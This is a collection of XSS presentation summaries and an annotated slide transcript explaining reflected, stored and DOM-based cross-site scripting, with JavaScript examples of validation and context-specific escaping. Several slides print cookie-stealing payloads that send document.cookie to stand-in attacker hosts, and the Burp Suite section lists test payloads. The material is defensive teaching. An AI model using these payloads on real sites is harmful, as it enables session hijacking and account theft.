Cross Site Scripting (XSS) is a vulnerability that lets a malicious user insert client-side code into a web page, where it is then executed by another user's browser. That code can steal cookies, read private information, perform actions on the user's behalf, and redirect them to malicious websites. XSS arises when the server echoes request data containing script into a page without escaping it. The presentation distinguishes non-persistent (reflected), persistent (stored), and DOM-based attacks. Prevention consists of validating input on the server (client-side validation is a usability aid only) and escaping output for the context it is inserted into. Web vulnerability scanners such as Burp Suite help test for XSS and other vulnerabilities.
Secure web programming plus end users' awareness are the last line of defense against attacks on corporate systems, particularly web applications, in the era of the world-wide web.
Most web application attacks occur through Cross Site Scripting (XSS) and SQL Injection. Conversely, most web application vulnerabilities arise from weak coding: failure to validate users' input properly and failure to sanitize output properly when displaying data to visitors.
The literature also reports the following distribution of web application weaknesses in 2010: 26% improper output handling, 22% improper input handling, 15% insufficient authentication, and others.
Abdul Rahman Sherzad, lecturer at the Computer Science Faculty of Herat University and Ph.D. student at Technical University of Berlin, gave a presentation at the 12th IT Conference on Higher Education for Afghanistan at MoHE, and then conducted a seminar at Hariwa Institute of Higher Education in Herat, Afghanistan, introducing web application security threats by demonstrating the security problems that exist in corporate systems, with a strong emphasis on secure development. Major security vulnerabilities and secure design and coding best practices for designing and developing web-based applications were covered.
The main objective of the presentation was to raise awareness of the problems that can occur in web application systems and of secure coding practices and principles. Its aims were to build security awareness for web applications, to discuss the threat landscape and the controls to apply during the software development lifecycle, to introduce attack methods, to discuss approaches for discovering security vulnerabilities, and finally to discuss the basics of secure web development techniques and principles.
This presentation covers cross site scripting attacks and defences in web applications. The talk was delivered as part of an OWASP Hyderabad Chapter meet. Comments and suggestions are welcome.
Vulnerabilities in modern web applications (Niyas Nazar)
Microsoft PowerPoint presentation for a BTech academic seminar. The seminar discusses penetration testing, penetration testing tools, web application vulnerabilities, the impact of vulnerabilities, and security recommendations.
+ Background & Basics of Web App Security, The HTTP Protocol, Web Application Insecurities
+ OWASP Top 10 Vulnerabilities (XSS, SQL Injection, CSRF, etc.)
+ Web App Security Tools (Scanners, Fuzzers, etc.), Remediation of Web App Vulnerabilities
+ Web Application Audits and Risk Assessment.
Web Application Security 101 was conducted by:
Vaibhav Gupta, Vishal Ashtana, Sandeep Singh from Null.
This presentation is from Null/OWASP/G4H November Bangalore MeetUp 2014.
technology.inmobi.com/events/null-owasp-g4h-november-meetup
Talk Outline:
A) Reflected (Non-Persistent) Cross-site Scripting
- What is reflected cross-site scripting
- Testing for reflected cross-site scripting
  - How to test: black box testing, bypassing XSS filters, gray box testing
  - Tools
- Defending against reflected cross-site scripting
- Examples of reflected cross-site scripting attacks
B) Stored (Persistent) Cross-site Scripting
- What is stored cross-site scripting
- How to test: black box testing, gray box testing
- Tools
- Defending against stored cross-site scripting
- Examples of stored cross-site scripting attacks
Cross site scripting (XSS) is a type of computer security vulnerability typically found in web applications. Proposed defensive measures have websites validate user input and test whether they are vulnerable to cross site scripting; the major considerations are input validation and output sanitization.
Many defense techniques have been introduced, and the coding methods developers use are evolving to counter cross site scripting, yet the threat persists in many web applications for the following reasons:
• The complexity of implementing the code or methods.
• Missing input validation and output sanitization on some input fields of the application.
• Lack of knowledge in identifying hidden XSS issues, etc.
This proposed project report briefly discusses what cross site scripting is and highlights the security features and defense techniques that can help against this widely versatile attack.
Cross site scripting (XSS) attacks: issues and defense (Sandeep Kumbhar)
Introduction
Impact of XSS attacks
Types of XSS attacks
Detection of XSS attacks
Prevention of XSS attacks
At client side
At Server-side
Conclusion
References
Misconfiguration is defined as configuration mistakes that result in unintended application behavior, including use of default passwords, excessive privileges, and disclosure of debugging information.
Introduction to Cross Site Scripting (XSS) (Irfad Imtiaz)
Contents :
- Introduction
- Description as A Widely Used Hacking Technique
- How it is used in Hacking
- What can be done with XSS
#XSS, #Hacking, #Security, #CookieStealing, #InternetBug, #HTMLInjection
Sincerely,
Irfad Imtiaz
Abstract
With the increased number of web applications, web security is becoming more and more significant. Cross-Site Scripting vulnerability, abbreviated as XSS, is a common web vulnerability. Exploiting XSS vulnerabilities can cause hijacked user sessions, malicious code injections into web applications, and critical information stealing. This article gives brief information about XSS, discusses its types, and designs a demo website to demonstrate attack processes of common XSS exploitation scenarios. The article also shows how to prevent XSS attacks with code illustrations.
2. What is XSS
Cross Site Scripting (XSS) is a vulnerability which, when present in a website or web application, allows a malicious user (hacker) to insert client-side code (normally JavaScript) into its pages. When that code is displayed in the web client (browsers such as IE or Mozilla) along with the original page, it runs as part of the page, giving the hacker control over what the page does in the victim's browser.
3. XSS (-ve) effects
- stealing other users' cookies
- stealing their private information
- performing actions on behalf of other users
- redirecting to other websites
- showing ads in hidden IFRAMEs and pop-ups
4. How XSS works
The web server receives data from the web client (POST, GET, cookies, etc.) with each request, so a malicious user can include client-side code snippets (JavaScript) in that data. For example:
Amit<script>alert('this site has been hacked');</script>
5. XSS input (screenshot)
Note: This image has been created using Firebug; this XSS hole is not present in google.com.
6. XSS contd.
Let's assume the web server performs no validation or filtering on this data. The server then either saves the data, XSS code included, to persistent storage (such as a database) or prints it straight back into the HTML. When that XSS code arrives in the web client (browser) together with the server's HTML, it executes as if it were the site's own code, so it gets access to the whole HTML document, the page URL, cookies (those without the HttpOnly flag), etc.
7. XSS (diagram)
The hacker's browser sends an HTTP request carrying XSS JavaScript to the server; the server's HTTP response returns that JavaScript to the hacker's browser.
8. XSS output (screenshot)
Note: This image has been created using Firebug; this XSS hole is not present in google.com.
10. Types of XSS attacks
- Non-persistent
- Persistent
- DOM based
11. Non-persistent
The XSS code is only reflected into the next page shown to the same user and is not saved to persistent storage such as a database. On its own this is the less dangerous variant, because the hacker who submits the payload only sees their own cookies and only modifies the page currently open in their own browser. The risk is that the hacker can put the crafted request into a link or image source on another site, so that a victim's browser sends it and the script runs in the victim's session; the next slide describes this link-based delivery under the heading CSRF. Example: the same as given previously to explain XSS.
12. CSRF
Cross-site request forgery is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts. It can be done by placing hidden links in a malicious website, for example:
<img src="http://bank.example/withdraw?account=bob<script>document.location='http://bad-domain.com/store_data?cookie=' + document.cookie;</script>">
Note that this particular example is a reflected XSS payload delivered through a forged request: the bank page echoes the account parameter, and the injected script sends the victim's cookie to the attacker's server.
13. CSRF (diagram)
The normal user's browser requests a page from the Bad Server, whose response contains the CSRF link above carrying the XSS payload. The user's browser then requests that link from the Bank Server, sending the user's cookies with it. The Bank Server's response echoes the XSS payload, which runs in the user's browser and posts the cookie to the Bad Server.
14. Persistent XSS
In the persistent type of XSS attack, the XSS code is saved to persistent storage such as a database along with other data, and is then visible to other users as well. One example is a blog site where the hacker adds XSS code to a comment; if no validation or filtering is present on the server, the code is saved to the database. After that, whenever any other user opens the page, the XSS code executes in their browser and can perform a variety of harmful actions. This type is the more dangerous one because the hacker can steal other users' cookies and modify the page they see; any third party can use the vulnerability to perform actions on behalf of other users. Example payload:
abc<script>window.location = "http://www.hackers.com?yid=" + document.cookie;</script>
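To make the difference between slides 11 and 14 concrete, here is an added example (not code from the slides): a tiny web application modelled as a single function so the request/response flows of the diagrams can be run under Node without a server. The routes (/search, /comment, /blog), the user names and the "shoes" query are assumptions; the payload is the one from slide 14.

```javascript
// Added example (not from the slides): a tiny web app modelled as one function,
// so the request/response flow of slides 11 and 14 can be run without a server.
// The routes (/search, /comment, /blog), user names and the "shoes" query are
// assumptions; the payload is the one from slide 14.

const comments = []; // the blog's "database" from slide 14

// Minimal HTML escaping of the five significant characters (slide 22).
const htmlEscape = (s) => String(s)
  .replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;')
  .replace(/"/g, '&quot;').replace(/'/g, '&#x27;');

// The app as slide 6 assumes it: no validation, no filtering. With
// { escape: true } it applies output escaping instead, for comparison.
function handleRequest(req, opts = {}) {
  const enc = opts.escape ? htmlEscape : (s) => String(s);
  if (req.method === 'GET' && req.path === '/search') {
    // Non-persistent: the value is echoed only into the response to this request.
    return `<p>Results for: ${enc(req.query.q || '')}</p>`;
  }
  if (req.method === 'POST' && req.path === '/comment') {
    // Persistent: the value is stored and will be rendered for everyone.
    comments.push({ user: req.user, text: req.body.text });
    return '<p>Comment saved</p>';
  }
  if (req.method === 'GET' && req.path === '/blog') {
    return '<ul>' + comments
      .map((c) => `<li>${enc(c.user)}: ${enc(c.text)}</li>`).join('') + '</ul>';
  }
  return '<p>404</p>';
}

const PAYLOAD =
  'abc<script>window.location = "http://www.hackers.com?yid=" + document.cookie;</script>';
const hasScript = (html) => html.includes('<script>');

// Runs the requests from the diagrams on slides 7, 13, 15 and 16 and reports,
// per request, whether raw script reached the browser.
function demo() {
  comments.length = 0;
  // Slide 11: the hacker submits the payload and gets it back in their own page.
  const hackerSearch = handleRequest({ method: 'GET', path: '/search', query: { q: PAYLOAD }, user: 'hacker' });
  // Another user's ordinary search is unaffected: nothing was stored.
  const aliceSearch = handleRequest({ method: 'GET', path: '/search', query: { q: 'shoes' }, user: 'alice' });
  // Slide 13: the same payload reaches alice if she is made to open the crafted link.
  const aliceClicksLink = handleRequest({ method: 'GET', path: '/search', query: { q: PAYLOAD }, user: 'alice' });
  // Slides 15-16: the hacker stores the payload; alice's normal page view now carries it.
  handleRequest({ method: 'POST', path: '/comment', body: { text: PAYLOAD }, user: 'hacker' });
  const aliceBlog = handleRequest({ method: 'GET', path: '/blog', user: 'alice' });
  // The same stored data rendered through the escaping path is inert markup.
  const aliceBlogEscaped = handleRequest({ method: 'GET', path: '/blog', user: 'alice' }, { escape: true });
  return {
    reflectedToSender: hasScript(hackerSearch),      // true
    reflectedToOtherUser: hasScript(aliceSearch),     // false
    reflectedViaLink: hasScript(aliceClicksLink),     // true
    storedToOtherUser: hasScript(aliceBlog),          // true
    storedEscaped: hasScript(aliceBlogEscaped),       // false
    escapedMarkup: aliceBlogEscaped.includes('&lt;script&gt;'), // true
  };
}
```

The two false results are the point: a reflected payload never reaches a user who did not send it (hence the need for the link on slide 12), and the stored payload stops being script the moment the renderer escapes it, even though the database still holds it verbatim.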
15. Persistent XSS, Step 1 (diagram)
The hacker's browser sends an HTTP request carrying XSS JavaScript; the server saves the XSS code to the DB.
16. Persistent XSS, Step 2 (diagram)
A normal user's browser requests the page; the server reads the stored code from the DB and returns an HTTP response containing the XSS JavaScript.
17. Persistent XSS (screenshot)
Note: This image has been created using Firebug; this XSS hole is not present in blogger.com.
18. DOM based attack
DOM Based XSS (or type-0 XSS) is an XSS attack wherein the attack payload is executed as a result of modifying the DOM "environment" in the victim's browser used by the original client-side script, so that the client-side code runs in an "unexpected" manner. That is, the page itself (the HTTP response) does not change, but the client-side code contained in the page executes differently due to the malicious modifications that have occurred in the DOM environment. This is in contrast to the other XSS attacks (stored or reflected), wherein the attack payload is placed in the response page due to a server-side flaw.
Example (from welcome.html):
...
var pos = document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
...
Invoked as http://www.vulnerable.site/welcome.html?name=Joe the page writes "Joe"; anything else placed after name= in the URL is written into the page as HTML.
19. Prevention
Never trust user input data, no matter where it comes from (GET, POST, COOKIE, etc.).
20. Validation at client side
Performing client-side (JavaScript) validation before submitting data to the server helps only with the usability of the website. It provides no actual security, because the user can disable JavaScript, or send the request directly with a proxy or script and bypass the page altogether. Many JavaScript libraries and frameworks offer such validation; for example, in the Dojo framework:
<label for="firstName">First Name: </label>
<input type="text" id="firstName" name="firstName" dojoType="dijit.form.ValidationTextBox" required="true" propercase="true" promptMessage="Enter first name." invalidMessage="First name is required." trim="true"/><br>
21. Validation at server
Sanitizing input data keeps malicious code out of the system. Checking for the proper data type helps to clean the data: first of all, restrict numeric fields to digits and text fields to alphanumeric characters.
- White lists: allow <strong>, <em> and <br> only. This does help, but is not 100%.
- Blacklists: block <script> and attributes such as onload, onclick, onmouseover, etc. Easily bypassed, since any tag or event handler not on the list passes through.
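The two approaches on this slide, as an added example (not code from the slides) that puts an allow-list check and a block-list filter side by side. The field types, patterns and sample inputs are assumptions for this illustration; the <img onerror> input is a generic event-handler injection used only to show what a block-list misses.

```javascript
// Added example (not from the slides): the two server-side approaches on
// slide 21 side by side. Field types, patterns and the sample inputs are
// assumptions for this illustration; the <img onerror> input is a generic
// event-handler injection used to show what a block-list misses.

// Allow-list: state exactly what each field may contain and reject everything else.
// The anchors (^ $) matter: without them "1<script" would pass a [0-9]+ check.
const ALLOW = {
  numeric: /^[0-9]+$/,
  alphanumeric: /^[A-Za-z0-9]+$/,
};

function allowListAccepts(type, value) {
  const re = ALLOW[type];
  if (!re) throw new Error(`unknown field type: ${type}`);
  return re.test(String(value));
}

// Block-list as the slide describes it: remove <script> tags and a few known
// event-handler attributes. Anything not on the list passes through untouched.
const BLOCKED = /<\/?script\b[^>]*>|\bon(load|click|mouseover)\s*=/gi;

function blockListClean(value) {
  return String(value).replace(BLOCKED, '');
}

function demo() {
  const scriptInput = "Amit<script>alert('this site has been hacked');</script>"; // slide 4
  const handlerInput = '<img src=x onerror=alert(1)>'; // constructed, not on the list
  return {
    allowRejectsScript: !allowListAccepts('alphanumeric', scriptInput),    // true
    allowAcceptsName: allowListAccepts('alphanumeric', 'Amit'),            // true
    allowRejectsPaddedNumber: !allowListAccepts('numeric', '42<b>'),       // true
    blockStripsScript: !blockListClean(scriptInput).includes('script'),    // true
    blockKeepsHandler: blockListClean(handlerInput).includes('onerror='),  // true
  };
}
```

The allow-list needs no knowledge of attacks, only of the data; the block-list needs a complete list of attacks, which nobody has. A tag allow-list like the slide's (<strong>, <em>, <br> only) belongs in an HTML parser that re-serialises the tree, not in a regex, which is why the slide rates it "not 100%".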
22. Escaping output at server
Problem characters include < > " ' &. These can be replaced with HTML character entities; for example, < becomes &lt;.
5 rules for escaping output:
#1 - HTML escape before inserting into element content
#2 - Attribute escape before inserting into attributes
#3 - JavaScript escape before inserting into JavaScript data values
#4 - CSS escape before inserting into style property values
#5 - URL escape before inserting into URL attributes
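The five rules above, as an added example (not code from the slides): one encoder per rule, applied to the same untrusted value in each of the five contexts. The encoders follow the OWASP "escape for the context" approach but are written here for illustration rather than taken from a library; the templates in renderProfile are assumptions.

```javascript
// Added example (not from the slides): one encoder per rule on slide 22,
// applied to the same untrusted value in each context. The encoders follow
// the OWASP "escape for the context" approach but are written here for
// illustration, not taken from a library; the templates in renderProfile
// are assumptions.

// Rule 1, element content: the five significant characters are enough.
const htmlEscape = (s) => String(s).replace(/[&<>"']/g, (c) => ({
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
}[c]));

// Rule 2, attribute values: encode everything but [A-Za-z0-9] as &#xHH;.
// The value then cannot end the attribute or start a new one, even if the
// template author forgot the surrounding quotes.
const attrEscape = (s) => String(s).replace(/[^A-Za-z0-9]/g,
  (c) => `&#x${c.charCodeAt(0).toString(16).toUpperCase()};`);

// Rule 3, JavaScript string values: \xHH (\uHHHH above 0xFF). This also
// neutralises "</script>", which would otherwise end the script block early
// regardless of any quotes.
const jsEscape = (s) => String(s).replace(/[^A-Za-z0-9]/g, (c) => {
  const code = c.charCodeAt(0);
  return code < 0x100
    ? `\\x${code.toString(16).padStart(2, '0')}`
    : `\\u${code.toString(16).padStart(4, '0')}`;
});

// Rule 4, CSS property values: the CSS \HH escape, terminated by a space.
const cssEscape = (s) => String(s).replace(/[^A-Za-z0-9]/g,
  (c) => `\\${c.charCodeAt(0).toString(16)} `);

// Rule 5, URL parameter values. Untrusted data must never become the scheme
// (javascript:) or host part of a URL; keep it to a parameter value.
const urlEscape = (s) => encodeURIComponent(String(s));

// Same value, five contexts, each with its own encoder.
function renderProfile(name) {
  return {
    content:   `<p>${htmlEscape(name)}</p>`,
    attribute: `<input value=${attrEscape(name)}>`,          // unquoted on purpose
    script:    `<script>var name = "${jsEscape(name)}";</script>`,
    style:     `<div style="width:${cssEscape(name)}"></div>`,
    url:       `<a href="/user?name=${urlEscape(name)}">profile</a>`,
    // The mistake rule 2 exists for: rule-1 escaping inside an unquoted
    // attribute leaves space and '=' alone, so a new attribute is injected.
    badAttribute: `<input value=${htmlEscape(name)}>`,
  };
}
```

Run renderProfile('x onmouseover=alert(1)') and compare attribute with badAttribute: the value contains none of the five characters rule 1 touches, so HTML escaping passes it through and the unquoted attribute gains an event handler, while attribute escaping turns the space and the equals sign into entities and the value stays a value.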
23. Escaping text before updating the DOM at client side
To avoid DOM-based XSS attacks, escape any data read from the URL or other client-side sources (or assign it as text rather than as HTML) before it is written into the page.
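Slides 18 and 23 together, as an added example (not code from the slides): the welcome.html snippet from slide 18 modelled as pure functions so it can be run under Node without a browser. document.URL becomes a URL string argument and the document.write / textContent sinks become return values. The fragment-based hostile URL and the safeName renderer are this example's assumptions, not the slide's.

```javascript
// Added example (not from the slides): the welcome.html snippet from slide 18
// modelled as pure functions so it can be run under Node without a browser.
// document.URL becomes a URL string argument and the document.write /
// textContent sinks become return values. The fragment-based hostile URL and
// the safeName renderer are this example's assumptions, not the slide's.

// Exactly the logic on slide 18: everything after "name=" in the full URL
// goes to document.write, which parses it as HTML.
function vulnerableName(documentURL) {
  const pos = documentURL.indexOf('name=') + 5;
  return documentURL.substring(pos, documentURL.length);
}

// What the server sees of the same URL: path and query only. The fragment
// (#...) never leaves the browser, so server-side filters and access logs
// see a clean request. That is why slide 18 calls this a client-side flaw.
function serverSideView(documentURL) {
  const u = new URL(documentURL);
  return u.pathname + u.search;
}

// Fix for slide 23: read the parameter with a real parser (so only the query
// string counts, never the fragment) and escape it before it touches the
// page. In a browser the escaping step is replaced by assigning the value
// to element.textContent, which never interprets markup.
const htmlEscape = (s) => String(s).replace(/[&<>"']/g, (c) => ({
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
}[c]));

function safeName(documentURL) {
  const name = new URL(documentURL).searchParams.get('name');
  return htmlEscape(name === null ? 'guest' : name);
}

// The slide's benign URL, and a constructed hostile one that carries the
// payload in the fragment so the server never sees it.
const BENIGN = 'http://www.vulnerable.site/welcome.html?name=Joe';
const HOSTILE = 'http://www.vulnerable.site/welcome.html#name=<script>alert(1)</script>';
```

vulnerableName(HOSTILE) returns the raw script for document.write to execute, while serverSideView(HOSTILE) is just /welcome.html: nothing server-side could have filtered it. safeName(HOSTILE) falls back to "guest" because the parameter is not in the query, and safeName of a query that does contain markup returns it as entities.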
24. Web vulnerability scanner applications
These applications let developers test their web applications for various types of vulnerabilities. They allow navigating through the web sites or web applications and performing various types of attacks (manual or automated). Both free and commercial applications are available (http://sectools.org/web-scanners.html).
25. Burp Suite
Burp Suite allows an attacker or tester to combine manual and automated techniques to enumerate, analyze, attack and exploit web applications. The various Burp tools work together effectively to share information and allow findings identified within one tool to form the basis of an attack using another.
Download: http://portswigger.net/suite/download.html
Documentation: http://portswigger.net/suite/help.html
26. Burp tools
- Proxy: an intercepting HTTP/S proxy server which operates as a man-in-the-middle between the browser and the target web application, allowing you to intercept, inspect and modify the raw traffic passing in both directions.
- Spider: an intelligent application-aware web spider which allows complete enumeration of an application's content and functionality.
- Scanner [Pro version only]: an advanced tool for performing automated discovery of security vulnerabilities in web applications.
- Intruder: a highly configurable tool for automating customized attacks against web applications, such as enumerating identifiers, harvesting useful data, and fuzzing for common vulnerabilities.
- Repeater: a tool for manually manipulating and re-issuing individual HTTP requests, and analyzing the application's responses.
- Sequencer: a tool for analyzing the quality of randomness in an application's session tokens or other important data items which are intended to be unpredictable.
- Decoder: a tool for performing manual or intelligent decoding and encoding of application data.
- Comparer: a utility for performing a visual "diff" between any two items of data, normally pairs of related requests and responses.
28. How to use
- Run the application and set the browser proxy to localhost:8080.
- Open any site (one you are authorised to test); Burp builds a site map tree in the left panel as you traverse it.
- Select any URL from the tree and send it to Intruder.
- Add different types of payloads for the attack, e.g. 1<script >alert(1);</script>
- Go to Intruder and click Start attack. Burp Suite shows the results in a new window; a response that contains the payload unescaped is the reflection to investigate.